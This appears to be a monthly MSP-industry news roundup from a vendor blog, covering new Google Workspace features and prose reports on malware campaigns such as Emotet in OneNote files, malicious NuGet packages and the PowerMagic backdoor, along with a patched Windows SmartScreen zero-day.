Blog Articles
Read MSP360’s latest news and expert articles about MSP business and technology
News You Might've Missed

News You Might’ve Missed. March 2023

News You Might’ve Missed. March 2023

What's New This Month in the News for MSPs?
Google says new smart chip features are coming to Workspace; new forms of malware from Asian attack group targeting companies; new PowerMagic and CommonMagic malware stealing data for hackers; hackers targeting DotNet developers using malicious NuGet packages; and more.

Let's see what it's all about.

Google Says New Smart Chip Features Are Coming to Workspace

Enhancements are coming to Google Workspace, according to Google LLC in an announcement this month. It has a new set of features that it’s rolling out that it has created to help users save time.

Over the next few weeks, we can expect to see these new features being released, but Google previewed them at its Cloud Next conference last year. They've used new smart chips for many of the new capabilities which they introduced in 2021. These new chips let users embed interactive elements like charts and data tables into their documents.

Google Docs is getting two new smart chips. One will let users embed a virtual stopwatch in their documents, while another gives a prepackaged calendar invite template. Once the template is completed, users can click a button that lets it sync with their Google Calendar automatically.

While these are basic, customers with more advanced requirements can create their own custom smart chips tailored to their specific needs. For example, dev teams can create a smart chip to make a to-do list of their tasks.

Google says it is also extending the Google Docs feature set in other directions. For example, the ability to embed emojis and upvote in documents is coming soon. It is also adding enhancements to support templates: users can create placeholder fields in a Google Doc and replace them with a data point later.

Google Sheets hasn't been left out in these updates. New additions to Sheets will let users embed data about stock tickers, currencies, and mutual funds into a spreadsheet. For example, when a user clicks the stock ticker, a pop-up panel appears that provides the current share price.

This update launches a new integration with Google Maps. Where a spreadsheet field contains the name of a location, a click reveals a pop-up that shows the location on a map.

In addition to launching these new features, Google has made several changes to the Google Workspace interface. Among these is a streamlined search bar for Google Drive that lets users filter documents based on file type and other criteria.

New Forms of Malware From Asian Attack Group Targeting Companies

A South Asia-based attack group has been targeting businesses globally using new forms of malware to steal data.

Researchers at Elastic Security Labs are tracking the activity as "REF2924" and say the group is well known for its malware. The first malware detected by the researchers is an executable named Wmdtc[.]exe and dubbed NAPLISTENER, which was found in January. NAPLISTENER was discovered by another new form of malware using the file name kavUpdate[.]exe, which was dubbed SOMNIRECORD in February.

The Wmdtc[.]exe gets installed as a Windows service and uses a naming convention very similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service. The researchers chose NAPLISTENER because the malware has an HTTP built into it written in C#. SOMNIRECORD or kavUpdate[.]exe is in .NET code and works as a simple loader.

Researchers say both NAPLISTENER and SOMNIRECORD are significant because they rely on open-source code projects that provide most or all of their capabilities. These not only obfuscate the adversary and their abilities but also reduce the additional effort required to develop those capabilities.

Additionally, both malwares were seen leveraging expected and legitimate protocols. For example, SOMNIRECORD leverages DNS, while NAPLISTENER uses HTTP, which helps them avoid network detection.

SOMNIRECORD and NAPLISTENER were observed with SIESTAGRAPH, which also appeared as a legitimate file to avoid detection. All three malwares were deployed on network-based visibility networks where endpoint protection wasn't standard. This threat operator has at least a moderate familiarity with the Asia region's security posture.

Additionally, researchers noted that REF2924 installed webshells, which are backdoors rendered using a web server and typically written in web-based code. Based on similar code used in these webshells, researchers say they also appear to be borrowed or repurposed code from open-source projects and note that this is a typical method used by many threat operators.

When reviewing the development and deployment history of SOMNIRECORD, they suspect that it came from eviction attempts by targeted businesses. This has led to a change in threat priorities, moving away from data theft to contingency plans.

Following their research and investigation into these malwares, the researchers say that threat operators will continue to deploy these malwares against targets using the methods of malicious IIS modules, webshells, and in-line proxy relays.

New PowerMagic and CommonMagic Malware Stealing Data for Hackers

Security analysts say they've found attacks from an advanced threat group using a malicious framework called CommonMagic, with a new backdoor called PowerMagic that they've never seen before.

The two malware parts have been active since September 2021 in attacks that are continuing. The targets are businesses in the administrative, transportation, and agriculture sectors, and their goal is espionage.

Once they gain access to a target's network, the hackers behind the CommonMagic espionage campaign use separate plugins to steal documents and data files (XLS, DOCX, DOC, XLSX, RTF, ODS, ODT, RAR, ZIP, PDF, TXT) from USB devices.

Additionally, the malware can take screenshots using the Windows Graphics Device Interface (GDI) API every 3 seconds. According to the researchers, the hackers' initial vector is spear phishing or similar to deliver a website URL pointing to a ZIP archive with a compromised LNK file.

According to Kaspersky, when the infected LNK is activated, it begins infecting the device with a previously undetected PowerShell-based back door that the researcher dubbed PowerMagic for the string in its code.

The backdoor connects with the CNC server, getting its instructions and then uploading the results using Dropbox and OneDrive folders.

The hackers infected the targets with CommonMagic after the PowerMagic infection, which contains many malicious tools that the researchers say they had not seen before.

Additionally, the analysis of the infection revealed that the threat actors had dedicated modules for many tasks, from communicating with the CNC server to decrypting and encrypting traffic from it, taking screenshots, and stealing documents.

They also use a OneDrive folder to exchange data with the CNC server, and they encrypt the files using the RC5Simple open-source library with a custom sequence at the beginning of the encryption – Hwo7X8p.

Hackers Targeting DotNet Developers Using Malicious NuGet Packages

.Net developers are the targets of threat actors who infect them with cryptocurrency stealers that are shared through the NuGet repository by impersonating many genuine packages through the typosquatting method.

According to the JFrog security researchers who discovered this campaign, three of the infected packages have been downloaded over 150,000 times in a month.

While some say the vast number of downloads points to the many .Net developers with compromised systems, others think another explanation could be that it's the attackers' efforts to legitimize the malicious NuGet packages.

To create NuGet repository profiles, the threat hackers used typosquatting to impersonate fake Microsoft software developers' accounts working on the NuGet .Net package manager.

They made these malicious packages to download and run a PowerShell-based dropper script called init.ps1. This configures the compromised device to allow PowerShell to run without restrictions. After this, it will download and run a custom Windows executable as a second-stage payload.

The researchers say this is a new approach, compared to other threat actors who typically use commodity malware and open-source hacking tools rather than making their own payloads.

These payloads are typically not detected as malicious by Microsoft Defender and are part of a larger malicious scheme.

Emotet Malware Used in Microsoft OneNote Files to Hide From Detection

Researchers now see the Emotet malware shared using Microsoft OneNote email attachments to avoid security restrictions from Microsoft and compromise more targets.
Historically, campaigns shared the Emotet malware botnet through Microsoft Excel and Word attachments containing compromised macros. When a target user clicks on the infected file and enables macros, a DLL that installs the malware on the system is downloaded and run.
After loading the Emotet malware, it steals email content and mail contacts for possible spam campaigns.
Additionally, the malware downloads more payloads that offer ‌initial entry to the corporate network. It uses this access to run cyberattacks against the business; these may include data theft, ransomware attacks, extortion, and cyber espionage.
In the past, Emotet was one of the most distributed malwares; during the past year, researchers noted a change in its activity with periodic starts and stops. By the end of 2022, it seemed to be taking a break, but it was a temporary lull and, three months later, the botnet was back to sending malicious emails globally.
Researchers say this latest attempt was flawed because it continued using Excel and Work documents, although Microsoft automatically blocks macros in them now.
Many observers suggested that the threat actors behind Emotet would soon make a move to use OneNote documents, and recently a security researcher discovered a new campaign using them. The attachments come in reply-chain emails appearing to be how-tos, guides, job references, invoices, etc.
When a recipient attempts to open an attached compromised OneNote document, a warning message indicates the document’s protection. The user is prompted to double-click the View button so the document appears correctly.
In the current Emotet malware campaign, a malicious VBScript file called click.wsf is embedded with the View button. The VBScript contains a heavily concealed script which downloads a DLL file from an external, compromised website URL and then launches it.
Microsoft OneNote will display a warning when a target user tries to run an embedded file in OneNote. Typically, users click OK to dismiss the alert but, when they do, it executes the VBScript using WScript.exe from OneNote’s Temp folder. This folder differs from user to user.
The Emotet malware will then be downloaded as a DLL, as seen on VirusTotal, and stored in the identical location. It uses regsvr32.exe to run the randomly named DLL.
After this, Emotet will run silently on the system, stealing contacts and emails while waiting for further commands from the CNC server.

Since Microsoft OneNote has become a malware distribution problem of significant proportions, Microsoft is planning to add enhancements to OneNote that will protect against phishing attacks. A release date for the update isn’t yet available.

Windows Zero-Day Exploit Used in the Magniber Ransomware Attacks Has Been Patched

Microsoft recently patched a zero-day bug that attackers used to bypass the Windows smart screen cloud-based anti-malware service that let them run Magniber ransomware payloads without detection.
Attackers used malicious MSI files signed with a custom Authenticode signature that allowed them to exploit the security features. It is being tracked as CVE-2023-24880.
Despite the invalid signature, it was enough to fool SmartScreen. It prevented MotW (Mark-of-the-Web) security warnings from appearing to alert users to take precautions when opening Internet files.
Google Threat Analysis Group discovered the CVE-2023-24880 zero-day vulnerability on February 15th and reported it to Microsoft.
Magniber ransomware has been active since October 2017 and is the successor to Cerber ransomware. Its focus targeted South Korea initially but has since expanded to include global targets, including Taiwan, China, Malaysia, Singapore, Hong Kong, and Europe.

That's a Wrap for News You Might've Missed

I hope this update has been helpful. MSP360 is your resource for MSP news. Stay home, stay safe and healthy, and remember to check back next month for more highlights.

Whitepaper icon

New call-to-action
IT Security Assessment Checklist

Assess vulnerabilities and threats, network security, workspace and equipment security, documentation, and more. The pack includes:

  • a ready-to-print PDF file
  • an Excel file to help create a customizable assessment resource